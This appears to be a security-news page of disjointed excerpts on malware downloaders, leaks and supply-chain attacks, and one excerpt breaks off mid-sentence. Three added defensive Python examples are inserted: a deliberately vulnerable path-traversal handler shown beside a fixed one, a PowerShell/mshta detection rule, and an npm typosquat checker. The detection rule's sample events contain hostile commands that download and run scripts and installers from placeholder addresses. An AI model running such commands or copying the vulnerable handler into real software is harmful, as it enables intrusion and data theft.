Mexico’s president announced that the government is investigating an alleged ransomware attack targeting the administration’s legal affairs office: “Today they are going to send me a report on the supposed hacking.” This is not the first time Mexico’s presidential office has been targeted in a hack involving sensitive information.
Fake file converters and download tools may perform the advertised task but can return files containing hidden malware, giving criminals access to victims’ devices. “To conduct this scheme, cyber criminals across the globe are using any type of free document converter or downloader tool.”
Initially, the group published screenshots of stolen data as proof of the attack; now the whole archive can be downloaded from the leak page.
The package is the official SDK for the XRP Ledger and the recommended library for integrating a JavaScript/TypeScript app with it, with more than 140,000 weekly downloads. Hundreds of thousands of applications and websites use it; the package has been downloaded over 2.9
“Since March 2025, Check Point Research has been tracking malicious GitHub repositories targeting Minecraft users with an undetected Java downloader.” Upon launching the game, the fake mod downloads a second-stage stealer, which then fetches an additional .NET-based stealer.
“Cyber criminals gain unauthorized access to home networks by either configuring the product with malicious software prior to the user’s purchase or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process,” reads the alert published by the FBI on BADBOX 2.0.
An LNK file, once executed, starts the attack chain. “Once opened, the LNK file executes a PowerShell command to download an MSI file from a remote server, renames it as “%AppData%y.msi”, and then executes/installs it using the Microsoft msiexec.exe tool.” Once executed, it downloads the payload directly into memory.
The unauthenticated RCE vulnerability PSV-2023-0039 impacts the following product models: XR1000 (fixed in firmware version 1.0.0.74) and XR500 (fixed in firmware version 2.3.2.134). “NETGEAR strongly recommends that you download the latest firmware as soon as possible.”
Threat actors stole certain internal documents, including files containing personal information; names and Social Security numbers were compromised in the attack. “Belk maintains a written information security program.” The stolen data are available for download, a circumstance that suggests a failed negotiation.
The attack involves executing a cmd script followed by a PowerShell script, which downloads three executables, including the Amadey botnet and two .NET executables (32-bit and 64-bit). The malware, dubbed PackerE, downloads an encrypted DLL (PackerD1) that employs multiple anti-analysis techniques.
Yesterday Banshee Stealer, the macOS-based Malware-as-a-Service infostealer, had its source code leaked online. “We’ve archived the leak and made it available for download on GitHub.”
WebTunnel is a stealthy bridge that blends in with web traffic; its small download size and uTLS integration make it safer for users and harder to detect.
The threat actors also employed two new downloaders, RustClaw and MeltingClaw, and two backdoors, the Rust-based DustyHammock and the C++-based ShadyHammock. “The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.”
The backdoor is distributed through phishing emails with themes such as a code of conduct to trick users into downloading the malware. Upon executing the archive, it drops a malicious Windows executable, which eventually downloads and executes the PLAYFULGHOST payload from a remote server.
GreyNoise also observed an attack that used wget to download a shell script providing reverse shell access. Organizations using PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on the Hisilicon Hi3516A V600 SoC V60, V61, and V63 should take immediate action to patch the discovered vulnerabilities and secure their systems.
Attackers can exploit a vulnerability, tracked as CVE-2025-0411, in the free, open-source file archiver 7-Zip to bypass the Windows Mark of the Web (MotW) security feature. MotW is the Windows mechanism that flags files downloaded from untrusted sources, such as the internet, so that they are opened with extra safeguards.
CrowdStrike warns of a phishing campaign that uses its recruitment branding to trick recipients into downloading a fake application, which finally installs the XMRig cryptominer. “Victims are prompted to download and run a fake application, which serves as a downloader for the cryptominer XMRig.”
Patchstack researchers uncovered a large-scale phishing campaign targeting WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ that hides a backdoor.
At this stage in our investigation, we have determined that a small number of files that were not authorized for public download may have been published. As of now, we have not observed any confidential information such as sensitive PII or financial data to be included but continue to investigate to confirm.
Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (bitdefender-download[.]com).
“Recently, the Federal Office for Information Security (BSI) announced it had blocked communication between the 30,000 devices infected with the BadBox malware and the C2. BadBox can also download additional payloads, amplifying the risks for the users,” continues the report.
In March–April 2024, during incident response within the information and communication system of a central executive body, Ukraine’s Computer Emergency Response Team (CERT-UA) identified a Windows system infected with BEARDSHELL and SLIMAGENT, two advanced malware tools written in C++.
Researchers found three malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. “Execution of the malicious modules can cause total data loss, major downtime, and severe financial and reputational harm, highlighting the need for strong supply chain security.”
The Internet Archive was breached again: attackers hacked its Zendesk email support platform using stolen GitLab authentication tokens. The exposed file contained an authentication token that allowed the attacker to download the Internet Archive’s source code, which included additional credentials and tokens.
The malicious packages discovered by the experts pose as Solana tools and have 130+ downloads, using Nodemailer to steal keys via Gmail and automate wallet draining. “It is important to verify a package’s authenticity by examining its download counts, publisher history, and any associated GitHub repository links.”
Russia-linked Gamaredon targets Ukraine with a phishing campaign that uses troop-related lures to deploy the Remcos RAT via a PowerShell downloader. Talos researchers attribute the campaign to the Russia-linked APT group Gamaredon.
North Korea-linked hackers uploaded 67 malicious npm packages carrying XORIndex malware, reaching 17K+ downloads in ongoing supply chain attacks. This follows the earlier HexEval loader campaign, which is still ongoing with over 8,000 downloads. Despite takedown efforts, 27 packages remain live.
“We urge the public to be cautious when downloading packages and to ensure they are from trusted sources to avoid falling victim to such attacks,” concludes the report.
CYFIRMA researchers discovered that the SpyLend Android malware was downloaded 100,000 times from the official Google Play store. “The Finance Simplified app is still available on Google Play at the time of this report’s publication, with downloads doubling to 100,000 in a week,” reads the report published by CYFIRMA.
The threat actors use the Civil Defense website to distribute multiple software programs that, once installed, download different malware families. The site serves Windows users a downloader called Pronsis Loader; this malware starts an attack chain that ultimately installs SUNSPINNER and the PURESTEALER information stealer.
The first vulnerability, CVE-2024-57727 (CVSS score of 7.5), is an unauthenticated path traversal issue allowing attackers to download arbitrary files from the server. At the end of January, researchers from security firm Arctic Wolf reported a campaign targeting SimpleHelp servers.
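The bug class behind CVE-2024-57727 is worth seeing in code. The following is an added example, not SimpleHelp’s code and not a reproduction of that CVE: a minimal “download a file by name” handler in its vulnerable form next to a hardened one, run against a directory tree constructed in a temporary folder. The file names and contents are made up for the demo.

```python
"""A 'download file by name' handler in vulnerable and hardened form.

Added example to illustrate the bug class named above (unauthenticated
path traversal leading to arbitrary file download). This is not
SimpleHelp's code and does not reproduce CVE-2024-57727; the directory
tree it operates on is constructed in a temporary folder."""
import os
import tempfile
from pathlib import Path


def download_vulnerable(root: str, requested: str) -> bytes:
    # Joins untrusted input straight onto the root: "../" walks out of it,
    # and an absolute path makes os.path.join discard the root entirely.
    with open(os.path.join(root, requested), "rb") as fh:
        return fh.read()


def download_hardened(root: str, requested: str) -> bytes:
    base = Path(root).resolve()
    # Reject absolute paths and NUL bytes up front, then resolve symlinks
    # and ".." components and require the result to sit below the root.
    if "\x00" in requested or os.path.isabs(requested):
        raise PermissionError("rejected path")
    target = (base / requested).resolve()
    if base not in target.parents:  # also rejects the root directory itself
        raise PermissionError("path escapes download root")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_bytes()


def build_demo_tree() -> tuple[str, str]:
    """Constructed layout: <tmp>/public/report.txt is servable,
    <tmp>/secret.txt sits one level above the download root."""
    tmp = tempfile.mkdtemp()
    root = os.path.join(tmp, "public")
    os.makedirs(root)
    Path(root, "report.txt").write_text("public report")
    Path(tmp, "secret.txt").write_text("db password")
    return tmp, root


def demo() -> dict:
    """Run the same requests through both handlers and collect outcomes."""
    _, root = build_demo_tree()
    results = {"vulnerable:../secret.txt": download_vulnerable(root, "../secret.txt")}
    for req in ("report.txt", "../secret.txt", "/etc/hostname", "missing.txt"):
        try:
            results["hardened:" + req] = download_hardened(root, req)
        except (PermissionError, FileNotFoundError) as exc:
            results["hardened:" + req] = type(exc).__name__
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The hardened version compares the resolved path against the resolved root rather than scanning the string for "..", so symlinks inside the download directory and encoded variants that the web framework has already decoded are handled the same way. It deliberately distinguishes an escape attempt (PermissionError) from a missing file (FileNotFoundError) so the former can be logged as an attack indicator.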
“BusyBox enables threat actors to perform various functions such as downloading and executing payloads on compromised devices.”
In a documented instance, attackers used a ClickFix social engineering tactic to trick users into running a PowerShell command that downloads and installs the Node.js runtime and a compiled JavaScript file. In this attack phase, a PowerShell script downloads an archive from the command-and-control server containing the Node.js components.
“To extract cookies from Chromium-based browsers, it downloads a module from the C&C to bypass App-Bound encryption. More information, including IoCs and the lists of locally installed apps and browser extensions, is available on GitHub,” reads the report published by Gen Digital.
“The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into executing a copied PowerShell command, which downloaded and ran MintsLoader.” The experts observed other infection chains that used fake invoice files (e.g., “Fattura####.js”).
Sansec researchers reported that multiple vendors were hacked in a coordinated supply chain attack; the experts discovered a backdoor hidden in 21 applications. “This hack is called a Supply Chain Attack, which is one of the worst types.” Meetanshi claims no tampering but confirms their server was hacked.
When opened, the lure files execute PowerShell or Mshta to download malware such as PebbleDash and RDP Wrapper to control the infected systems. Upon running the code as an administrator, it downloads and installs a browser-based remote desktop tool and fetches a certificate file with a hardcoded PIN from a remote server.
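Several of the items above (the LNK-to-msiexec chain, the ClickFix lures that install Node.js or MintsLoader, and the PowerShell/Mshta droppers) share one telemetry shape: a user-facing parent such as explorer.exe or a browser spawns powershell.exe or mshta.exe with a hidden or encoded command that fetches and runs something from a URL. The detection logic below is an added example written for this page, not code from any of the vendors quoted; the process-creation events it scans are constructed to resemble Sysmon-style fields (parent image, image, command line), and the 203.0.113.x addresses are documentation-range placeholders.

```python
"""Detection logic for ClickFix-style PowerShell/mshta downloaders.

Added example, not code from any report quoted on this page. The sample
events are constructed to resemble process-creation telemetry (parent
image, image, command line) and are not real captures; the 203.0.113.x
addresses are documentation-range placeholders."""
import base64
import re

# ClickFix lures make the victim paste a command into the Run box or a
# browser-launched prompt, so the parent is a shell/browser rather than a
# scheduler, IDE or deployment agent.
LAUNCHER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
STEALTH_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|"
    r"start-bitstransfer)\b|https?://")
EXEC_RE = re.compile(r"(?i)\biex\b|invoke-expression|\bmsiexec\b|\bmshta\b")

SAMPLE_EVENTS = [  # (parent image, image, command line), constructed
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -c "iex (iwr http://203.0.113.10/a.ps1 -UseBasicParsing)"'),
    ("explorer.exe", "mshta.exe", "mshta http://203.0.113.10/x.hta"),
    ("chrome.exe", "powershell.exe",
     "powershell -nop -enc " + base64.b64encode(
         "msiexec /i http://203.0.113.10/y.msi /qn".encode("utf-16le")).decode()),
    ("devenv.exe", "powershell.exe", "powershell -File build.ps1"),
    ("cmd.exe", "powershell.exe", "powershell Get-ChildItem C:\\logs"),
]


def decode_encoded(cmdline: str) -> str:
    """Return the UTF-16LE payload behind -EncodedCommand, or '' if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(parent: str, image: str, cmdline: str) -> list[str]:
    """Collect the reasons an event looks like a paste-and-run downloader."""
    reasons: list[str] = []
    if image.lower() not in LOLBINS:
        return reasons
    text = cmdline
    decoded = decode_encoded(cmdline)
    if decoded:
        reasons.append("encoded command")
        text = cmdline + " " + decoded  # scan the decoded script as well
    if parent.lower() in LAUNCHER_PARENTS:
        reasons.append(f"spawned by {parent.lower()}")
    if STEALTH_RE.search(text):
        reasons.append("hidden window / no profile")
    if DOWNLOAD_RE.search(text):
        reasons.append("remote download")
    if EXEC_RE.search(text):
        reasons.append("execution of fetched content")
    return reasons


def is_suspicious(reasons: list[str]) -> bool:
    # A download on its own is routine; a download combined with a launcher
    # parent, a hidden window, encoding or in-memory execution is not.
    return "remote download" in reasons and len(reasons) >= 2


def scan(events) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that trips the rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyze(*event)
        if is_suspicious(reasons):
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i][2][:60], "->", ", ".join(reasons))
```

The rule scores on a combination of parent process, stealth flags and download/execute verbs rather than on any single string, and it decodes -EncodedCommand before matching, because the ClickFix variants that install Node.js or run msiexec commonly hide the URL inside the base64 blob. The first three constructed events are flagged; the developer build and the plain directory listing are not.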
The script will download and run the .NET bootloader MSCommondll.exe, which in turn will download and run the DarkCrystal RAT malware.
The malicious extension used two files: worker.js, which contacted a hardcoded C&C server to download configuration and executed HTTP calls, and content.js.
FrameworkLoader downloads LightSpy’s Core module and the plugins used by the spyware. “That is why it will download an additional file “resources.zip” which also contains jailbreak-helping files which are related to the jailbreak process on iOS version family 12,” continues the report.
Serbian authorities also extensively and illegitimately used the Cellebrite extraction suite to download personal data from the phones of journalists and protest organizers.
The campaign is still ongoing and the malicious packages collectively totaled more than one thousand downloads. “The attack has led to the identification of 20 malicious packages published by three primary authors, with the most downloaded package, @nomicsfoundation/sdk-test, accumulating 1,092 downloads.”
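The Solana, XORIndex and @nomicsfoundation items above all end with the same advice: check download counts, publisher history and the linked repository before trusting a package, and watch for names that imitate ones you already use. The script below is an added example written for this page, not code from any of the researchers quoted. It applies those checks offline to a constructed dependency list; only the @nomicsfoundation/sdk-test name and its 1,092-download figure come from the report, and the remaining metadata (publisher age, repository links, install-script flags, other package names) is made up for the demo. In practice the metadata would come from the npm registry API or `npm view <pkg>`.

```python
"""Offline triage of npm dependencies for typosquats and weak provenance.

Added example, not code from any of the reports quoted on this page. It
applies the checks the quoted advice names (download counts, publisher
history, linked repository) plus an edit-distance comparison against
package names you already trust. The registry metadata below is
constructed for the demo; in practice it comes from the npm registry API
(https://registry.npmjs.org/<pkg>) or `npm view <pkg>`."""

# Names the project already depends on and has reviewed (example allow-list).
TRUSTED = ["@nomicfoundation/hardhat-ethers", "@solana/web3.js", "xrpl", "lodash"]

# Constructed dependency list. The @nomicsfoundation name and its 1,092
# downloads are from the report above; the rest is made up for the example.
DEPENDENCIES = {
    "@nomicsfoundation/sdk-test": {
        "downloads": 1092, "publisher_age_days": 9,
        "repository": None, "has_install_script": True},
    "@solana/web3.js": {
        "downloads": 850_000, "publisher_age_days": 2_000,
        "repository": "https://github.com/solana-labs/solana-web3.js",
        "has_install_script": False},
    "lodahs": {
        "downloads": 40, "publisher_age_days": 3,
        "repository": None, "has_install_script": False},
    "xrpl": {
        "downloads": 140_000, "publisher_age_days": 3_000,
        "repository": "https://github.com/XRPLF/xrpl.js",
        "has_install_script": False},
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_scope(name: str):
    """'@scope/pkg' -> ('@scope', 'pkg'); 'pkg' -> (None, 'pkg')."""
    if name.startswith("@") and "/" in name:
        scope, base = name.split("/", 1)
        return scope, base
    return None, name


def typosquat_of(name: str, trusted, max_dist: int = 2):
    """Return the trusted name this one imitates, or None.

    Scoped packages are compared scope-to-scope (the report's attack swapped
    @nomicfoundation for @nomicsfoundation); unscoped packages are compared
    on the whole name. Exact matches are not typosquats."""
    scope, _ = split_scope(name)
    for t in trusted:
        tscope, _ = split_scope(t)
        if scope and tscope:
            if scope != tscope and levenshtein(scope, tscope) <= max_dist:
                return t
        elif not scope and not tscope:
            if name != t and levenshtein(name, t) <= max_dist:
                return t
    return None


def assess(name: str, meta: dict, trusted=TRUSTED) -> list[str]:
    """Apply the provenance checks to one package; thresholds are example values."""
    findings = []
    look_alike = typosquat_of(name, trusted)
    if look_alike:
        findings.append(f"name is a near-miss of trusted {look_alike}")
    if meta["downloads"] < 5_000:
        findings.append("low download count")
    if meta["publisher_age_days"] < 90:
        findings.append("publisher account is new")
    if not meta["repository"]:
        findings.append("no linked source repository")
    if meta["has_install_script"]:
        findings.append("declares an install/preinstall script")
    return findings


def audit(deps: dict, trusted=TRUSTED) -> dict:
    """Map each dependency that raised at least one finding to its findings."""
    report = {}
    for name, meta in deps.items():
        findings = assess(name, meta, trusted)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for pkg, findings in audit(DEPENDENCIES).items():
        print(pkg)
        for finding in findings:
            print("  -", finding)
```

Comparing scopes separately from package names matters because the attack in the report kept a plausible package name under a look-alike scope; a whole-string distance would miss it. The install-script check is included because a lifecycle script is what turns a typosquat into code execution at `npm install` time.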
In September, security researchers from G DATA discovered more than two dozen Android mobile phones from different manufacturers already infected with pre-installed malware.
PCMag cited the case of a gamer who downloaded the game and reported that his accounts were hijacked using stolen cookies. SteamDB estimates that over 800 users may have downloaded the game.